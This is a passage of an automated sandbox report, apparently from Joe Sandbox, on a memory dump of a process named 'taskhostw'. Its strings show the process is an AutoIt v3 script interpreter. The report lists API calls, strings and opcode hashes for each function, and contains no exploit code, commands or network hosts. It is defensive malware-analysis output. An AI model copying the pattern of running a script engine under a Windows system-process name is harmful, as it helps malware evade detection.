DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D594FB
_wcsncpy.LIBCMT ref: 00D5956E
DeleteFileW.KERNEL32(?,?), ref: 00D595A4
CopyFileW.KERNEL32 ref: 00D595BA
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D595CB
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D595DD

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 85de86b75433a4cad335e3914b4f8719ec18f54046b8f71e1543b9a3fcb8f8f8
Instruction ID: ec64d86615331839a5c690a43f8f2f03ec5109d434d46048ea15f73542b747f8
Opcode Fuzzy Hash: 85de86b75433a4cad335e3914b4f8719ec18f54046b8f71e1543b9a3fcb8f8f8
Instruction Fuzzy Hash: C5C13CB1D0021DAADF21DF95CC95AEEB7BDEF44310F0040A6FA09E6151EB709A898F75

Function 00CF71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CF4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00DB52F8,?,00CF37C0,?), ref: 00CF4882

Part of subcall function 00D1068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00CF72C5), ref: 00D106AD

RegOpenKeyExW.KERNEL32 ref: 00CF7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D2EC21
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00D2EC62
RegCloseKey.ADVAPI32(?), ref: 00D2ECA0
_wcscat.LIBCMT ref: 00D2ECF9

Strings

\, xrefs: 00D2ED1C
\Include\, xrefs: 00CF72C5
Include, xrefs: 00D2EC18, 00D2EC59
Software\AutoIt v3\AutoIt, xrefs: 00CF72FE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: c550b729da20b378e734bfb9248ef3d1a460de70511d44bd5d457638d101cd87
Instruction ID: dcd8375f9a718f20fc42bca05c5d942a8925b4687707b08fb869030e00f662d6
Opcode Fuzzy Hash: c550b729da20b378e734bfb9248ef3d1a460de70511d44bd5d457638d101cd87
Instruction Fuzzy Hash: 5D717C71408305EED714EF65E8819ABBBE8FF98300B44462EF545C32A0EB74D948DBB6

Function 00CF3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00CF3A62
LoadCursorW.USER32 ref: 00CF3A71
LoadIconW.USER32 ref: 00CF3A88
LoadIconW.USER32 ref: 00CF3A9A
LoadIconW.USER32 ref: 00CF3AAC
LoadImageW.USER32 ref: 00CF3AD2
RegisterClassExW.USER32(?), ref: 00CF3B28

Part of subcall function 00CF3041: GetSysColorBrush.USER32 ref: 00CF3074
Part of subcall function 00CF3041: RegisterClassExW.USER32(00000030), ref: 00CF309E
Part of subcall function 00CF3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CF30AF
Part of subcall function 00CF3041: InitCommonControlsEx.COMCTL32(?), ref: 00CF30CC
Part of subcall function 00CF3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CF30DC
Part of subcall function 00CF3041: LoadIconW.USER32 ref: 00CF30F2
Part of subcall function 00CF3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CF3101

Strings

#, xrefs: 00CF3B0D
0, xrefs: 00CF3B06
AutoIt v3, xrefs: 00CF3B17

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9a29f51edad6fb8c22997db3673e55be5d835b582c0ba6e9b4fdc07fa521fae5
Instruction ID: 13c96e9cf690dd005b6d54c15e66988829b5511efd494d001b0325857138d799
Opcode Fuzzy Hash: 9a29f51edad6fb8c22997db3673e55be5d835b582c0ba6e9b4fdc07fa521fae5
Instruction Fuzzy Hash: 2F213970902309EFEB55DFA4FC09B9D7BB4FB08711F10022AE604E63A1D7B54A409FA8

Function 00CF3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00CF36D2
KillTimer.USER32 ref: 00CF36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CF371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CF372A
CreatePopupMenu.USER32 ref: 00CF373E
PostQuitMessage.USER32(00000000), ref: 00CF375F

Strings

TaskbarCreated, xrefs: 00CF3725

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 9a3f3b7d294895b9f8e422fd6e84ebbe0d6020985f69e03b80f8c60ff1b13360
Instruction ID: edac07f14c227fe1f36c037a632d9c755b18b1902914c18ac5f4f24044928f9e
Opcode Fuzzy Hash: 9a3f3b7d294895b9f8e422fd6e84ebbe0d6020985f69e03b80f8c60ff1b13360
Instruction Fuzzy Hash: A54125B220468DFBDBA87F64FD09BBE3A55FB51300F140225FB06C63A1DA609E409677

Function 00CF3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteScript, xrefs: 00CF38CE
/AutoIt3ExecuteLine, xrefs: 00CF38B9
/AutoIt3OutputDebug, xrefs: 00CF38A4
CMDLINE, xrefs: 00CF3834
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00CF37C0
/ErrorStdOut, xrefs: 00CF388F
CMDLINERAW, xrefs: 00CF380D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 05a1bf28327013b92b96edb13a5f14f454871e9e42409237a77c959032c71fc9
Instruction ID: d3a429608b1fb6f6d55be26fa978c1cc86b848d3643511279d1e5be86237f5f3
Opcode Fuzzy Hash: 05a1bf28327013b92b96edb13a5f14f454871e9e42409237a77c959032c71fc9
Instruction Fuzzy Hash: 14A16C7281026DAACF54EFA0DC91AFEB778FF14300F44012AF616A7191EF745A49DB62

Function 00CFF8CF Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D102E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D10313
Part of subcall function 00D102E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D1031B
Part of subcall function 00D102E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D10326
Part of subcall function 00D102E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D10331
Part of subcall function 00D102E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D10339
Part of subcall function 00D102E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D10341

Part of subcall function 00D06259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00CFFA90), ref: 00D062B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00CFFB2D
OleInitialize.OLE32(00000000), ref: 00CFFBAA
CloseHandle.KERNEL32(00000000), ref: 00D34921

Strings

Dj, xrefs: 00CFFA5E
@Ej, xrefs: 00CFFA74
xPj, xrefs: 00CFFA90

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: @Ej$xPj$Dj
API String ID: 1986988660-1479794073
Opcode ID: b22a6922c47e6262bb210255d220c4a655934f12b7ca596df54a0c6eef5e3132
Instruction ID: 8ea9446b26586761aba55a88ef4d2a07ac53e057fcfb07ca059e311234cc3f47
Opcode Fuzzy Hash: b22a6922c47e6262bb210255d220c4a655934f12b7ca596df54a0c6eef5e3132
Instruction Fuzzy Hash: 5C81B8B0911B40CFC395EF39B8457697BE5FB883067A4872AD01ACB36AEB7044858F31

Function 00CF39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00CF3A15
CreateWindowExW.USER32 ref: 00CF3A36
ShowWindow.USER32(00000000), ref: 00CF3A4A
ShowWindow.USER32(00000000), ref: 00CF3A53

Strings

edit, xrefs: 00CF3A30
AutoIt v3, xrefs: 00CF3A0D, 00CF3A12, 00CF3A13

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5c3cb43ca60a2dfd77b25c31a18239acc454ad4d9f8c36d6061568fdea12152e
Instruction ID: c4501bd11d07c21e078c83d86936318651560394a3ac4fa9cee6ebac0f69e598
Opcode Fuzzy Hash: 5c3cb43ca60a2dfd77b25c31a18239acc454ad4d9f8c36d6061568fdea12152e
Instruction Fuzzy Hash: 11F0DA71542790FEEA3157277C49F6B2E7DD7C6F50F00422EB904E2374D6621851DAB4

Function 00CF410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D2D51C

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

_memset.LIBCMT ref: 00CF418D
_wcscpy.LIBCMT ref: 00CF41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CF41F1

Strings

Line: , xrefs: 00D2D545

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 8e0d85182468f35aecb01f36da16a304d02fbd05b40af2461c1739a603f78a73
Instruction ID: d7cdb6fb3c6e8650db56970ce0b263d7623d5be640ab2a0476b1a4a8578b030a
Opcode Fuzzy Hash: 8e0d85182468f35aecb01f36da16a304d02fbd05b40af2461c1739a603f78a73
Instruction Fuzzy Hash: D231D331409308EED7A5EB60EC45BFF77E8AF45300F10461EF295921A1EB749648D7A7

Function 00D1558D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00D155EB
_memcpy_s.LIBCMT ref: 00D1565D
__read_nolock.LIBCMT ref: 00D156BB
__filbuf.LIBCMT ref: 00D156DE
_memset.LIBCMT ref: 00D15722

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction ID: 48993d525090fada2aec4b7fae81db609d7bd62009ad505b63c3df6e8bcb7e84
Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction Fuzzy Hash: 6C51CB30A00B05FBDB248F65F8815EE77A6EF81320F284729F825961D5DF799D908B70

Function 00CF69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CF4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00DB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CF4F6F

_free.LIBCMT ref: 00D2E5BC
_free.LIBCMT ref: 00D2E603

Part of subcall function 00CF6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00CF6D0D

Strings

Bad directive syntax error, xrefs: 00D2E5EB
>>>AUTOIT SCRIPT<<<, xrefs: 00D2E392

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 50d448a6c1994ad94b892520b70bc588a4d35a8c4ff2fb00a1d66b8cdaee1eea
Instruction ID: b45282848a445faf588f68fb08e9974047614d7ffa2fc65059cf7e8e776bd513
Opcode Fuzzy Hash: 50d448a6c1994ad94b892520b70bc588a4d35a8c4ff2fb00a1d66b8cdaee1eea
Instruction Fuzzy Hash: 1291BD31910229AFCF04EFA4DC919EDB7B4FF18318F14442AF915AB2A1EB30A945DB70

Function 00CF35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00CF35D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00CF35F5
RegCloseKey.ADVAPI32(00000000), ref: 00CF3617

Strings

Control Panel\Mouse, xrefs: 00CF35D2

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 1be03479f25d7d8066e9c36420e9ef578b240377974f57d7db7dc07f278ed939
Instruction ID: 87cca02380d1a07f63242264623014954e3a80c306b1b804839a23fd9c4e11b5
Opcode Fuzzy Hash: 1be03479f25d7d8066e9c36420e9ef578b240377974f57d7db7dc07f278ed939
Instruction Fuzzy Hash: 64113371610248BBDF208F64D880AFEBBA8FF04740F018469B909D7210E2719F409BA5

Function 00D59604 Relevance: 6.2, APIs: 4, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CF5045: _fseek.LIBCMT ref: 00CF505D

Part of subcall function 00D597DD: _wcscmp.LIBCMT ref: 00D598CD
Part of subcall function 00D597DD: _wcscmp.LIBCMT ref: 00D598E0

_free.LIBCMT ref: 00D5974B
_free.LIBCMT ref: 00D59752
_free.LIBCMT ref: 00D597BD

Part of subcall function 00D12ED5: HeapFree.KERNEL32(00000000,00000000), ref: 00D12EE9
Part of subcall function 00D12ED5: GetLastError.KERNEL32(00000000,?,00D19BA4), ref: 00D12EFB

_free.LIBCMT ref: 00D597C5

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: b3f6567e073dc41b9cde4c81caa25ac81c2106ebaac14d56ce7c7b1c630cf052
Instruction ID: 97628296f28214b8ee9da6bf660f34c5ea56f9e93c5906c2ae8bfc42f734d346
Opcode Fuzzy Hash: b3f6567e073dc41b9cde4c81caa25ac81c2106ebaac14d56ce7c7b1c630cf052
Instruction Fuzzy Hash: CC516FB1D04218EFDF249F64DC81AAEBBB9EF48300F10049EF609A7241DB715A94CF69

Function 00D1487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D14910
__flush.LIBCMT ref: 00D14930
__write.LIBCMT ref: 00D14963
__flsbuf.LIBCMT ref: 00D14991

Part of subcall function 00D18CA8: __getptd_noexit.LIBCMT ref: 00D18CA8

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction ID: 5d2dc8422b3277f757a6ebd9ae64e28300236250304d93c07f04bb3723a9a10d
Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
Instruction Fuzzy Hash: BA41B471605606BBDB188E69E8819EF7BA6EF44360B28863DE85587640DF70DDC18F70

Function 00CF4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CF4560

Part of subcall function 00CF410D: _memset.LIBCMT ref: 00CF418D
Part of subcall function 00CF410D: _wcscpy.LIBCMT ref: 00CF41E1
Part of subcall function 00CF410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CF41F1

KillTimer.USER32 ref: 00CF45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CF45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D2D5FE

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 16dcf2c0d1e5034874a75e5a948bfc21760a8900d0bf662a25937da20437a61a
Instruction ID: 50ae072e31f94ef3d08bda32c43fd583eb4c80e0a01203fc28ccd8e1900dab02
Opcode Fuzzy Hash: 16dcf2c0d1e5034874a75e5a948bfc21760a8900d0bf662a25937da20437a61a
Instruction Fuzzy Hash: 1D210A709047989FE7729B24D845BF7BBEC9F1230CF04009DE39D96245D7B45A848B62

Function 00CF73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D2ED92
GetOpenFileNameW.COMDLG32(?), ref: 00D2EDDC

Part of subcall function 00CF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CF48A1,?,?,00CF37C0,?), ref: 00CF48CE

Part of subcall function 00D10911: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00CF741D,00000001,00DB6290,?,00CF3BCD,00DB52F8,00DB52E0,?,?), ref: 00D10930

Strings

X, xrefs: 00D2EDAA

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f90cbcf567d0aa1884183bf2801a4abc5022586fb24cbaa4e54479da94f28585
Instruction ID: ca84276d021949e85f428ac7dd8763611107757d84cd154bc2beb864d8d524cc
Opcode Fuzzy Hash: f90cbcf567d0aa1884183bf2801a4abc5022586fb24cbaa4e54479da94f28585
Instruction Fuzzy Hash: 2D21AE70A0025CABCB519F94D845BFE7BF8AF49304F04805AE908A7341DFB459899FB2

Function 00D58E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D58E55
